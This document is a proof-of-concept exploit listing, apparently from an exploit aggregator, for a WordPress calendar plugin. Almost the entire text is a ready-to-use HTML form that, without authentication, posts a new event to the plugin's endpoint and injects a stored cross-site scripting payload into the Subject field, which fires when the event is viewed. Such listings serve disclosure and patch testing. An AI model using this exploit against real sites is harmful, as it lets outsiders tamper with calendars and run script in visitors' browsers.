Share
## https://sploitus.com/exploit?id=WPEX-ID:95F92062-08CE-478A-A2BC-6D026ADF657C
As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below

<html>
  <body>
    <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST">
      <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="colorvalue" value="#f00" />
      <input type="hidden" name="rrule" value="" />
      <input type="hidden" name="rruleType" value="" />
      <input type="hidden" name="stpartdate" value="10/6/2022" />
      <input type="hidden" name="stparttime" value="00:00" />
      <input type="hidden" name="etpartdate" value="10/6/2022" />
      <input type="hidden" name="etparttime" value="00:00" />
      <input type="hidden" name="stpartdatelast" value="10/6/2022" />
      <input type="hidden" name="etpartdatelast" value="10/6/2022" />
      <input type="hidden" name="stparttimelast" value="" />
      <input type="hidden" name="etparttimelast" value="" />
      <input type="hidden" name="IsAllDayEvent" value="1" />
      <input type="hidden" name="Location" value="CSRF" />
      <input type="hidden" name="Description" value='<p style="text-align: left;">CSRF</p>' />
      <input type="hidden" name="timezone" value="4.5" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when viewing the related event